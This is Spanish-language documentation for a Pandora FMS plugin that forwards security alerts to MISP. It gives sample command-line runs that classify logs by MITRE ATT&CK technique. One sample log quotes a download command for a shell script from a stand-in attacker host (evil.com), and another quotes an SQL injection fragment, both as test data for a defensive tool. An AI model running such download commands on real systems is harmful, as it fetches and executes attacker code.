Ejecución Manual
Antes de dejar la integración funcionando en automático, es altamente recomendable realizar pruebas manuales desde la terminal del servidor de Pandora FMS. Esto nos permite verificar la conectividad con MISP y comprobar cómo el motor de auto-clasificación (Triaje) analiza los logs en crudo para asignar el nivel de amenaza y las tácticas de MITRE ATT&CK.
A continuación, se presentan 6 ejemplos de ejecución basados en diferentes vectores de ataque, más un ejemplo avanzado usando todos los parámetros opcionales.
Recuerda sustituir https://misp.midominio.com y TU_API_KEY por los datos reales de tu entorno antes de ejecutar los comandos.
1. Explotación de Aplicación Pública (MITRE T1190)
El script detecta intentos de inyección SQL o XSS.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.midominio.com" -k "TU_API_KEY" \
-a "Web_Server_Apache" -n "Intento de SQL Injection" \
-d "Detectado ataque: select * from users en login.php desde la IP 192.168.1.100"
2. Transferencia de Herramientas Maliciosas (MITRE T1105)
El script detecta comandos de descarga sospechosos en la terminal.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.midominio.com" -k "TU_API_KEY" \
-a "Linux_App_Server" -n "Descarga de Payload" \
-d "Ejecucion sospechosa: wget http://evil.com/shell.sh iniciada por 10.0.0.50"
3. Ejecución por Usuario / Malware (MITRE T1204)
El script detecta alertas de antivirus o cuarentenas.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.midominio.com" -k "TU_API_KEY" \
-a "Windows_Endpoint_01" -n "Infección de Malware" \
-d "Antivirus alert: malware trojan quarantined. Origen de descarga: 198.51.100.44"
4. Uso de Cuentas Válidas / Viaje Imposible (MITRE T1078)
El script detecta anomalías en los inicios de sesión.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.midominio.com" -k "TU_API_KEY" \
-a "VPN_Gateway" -n "Viaje Imposible Detectado" \
-d "Alerta de seguridad: impossible travel VPN login from malicious IP 203.0.113.42"
5. Phishing / Spearphishing (MITRE T1566)
El script clasifica ataques recibidos por correo electrónico.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.midominio.com" -k "TU_API_KEY" \
-a "Mail_Exchange" -n "Correo Malicioso" \
-d "Filtro de correo: malicious attachment bloqueado del remitente con IP 203.0.113.99"
6. Fuerza Bruta (MITRE T1110)
El script detecta intentos repetidos de autenticación fallida.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.midominio.com" -k "TU_API_KEY" \
-a "SSH_Server" -n "Ataque de Fuerza Bruta" \
-d "Raw log: Failed password for root from 192.168.1.200 port 22 ssh2"
7. Ejecución Avanzada (Sobrescribir Triaje)
Si prefieres ignorar la clasificación automática del script y forzar tus propios valores, puedes usar los parámetros opcionales. En este ejemplo, forzaremos el nivel TLP a rojo, el nivel de amenaza a Crítico (1), compartiremos con la comunidad (1), asignaremos la categoría manualmente y añadiremos dos etiquetas personalizadas.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.midominio.com" -k "TU_API_KEY" \
-a "Main_Firewall" -n "Ataque Crítico Personalizado" \
-d "Alerta custom: denegación de servicio desde 10.10.10.10" \
-t "tlp:red" \
-s 1 \
-l 1 \
-c "Network activity" \
-g "SOC-Team, Critical-Alert, misp-galaxy:mitre-attack-pattern=\"Network Denial of Service - T1498\""
8. Verificación
Tras ejecutar cualquiera de estos comandos, el script devolverá un 1 (éxito) o un 0 (error) en la consola. Para comprobar los detalles, revisa el archivo de registro del plugin:
tail -f /var/log/pandora/pandora_misp_integration.log
Finalmente, accede a tu consola web de MISP y verás el evento recién creado con su IP extraída y las etiquetas MITRE correspondientes.
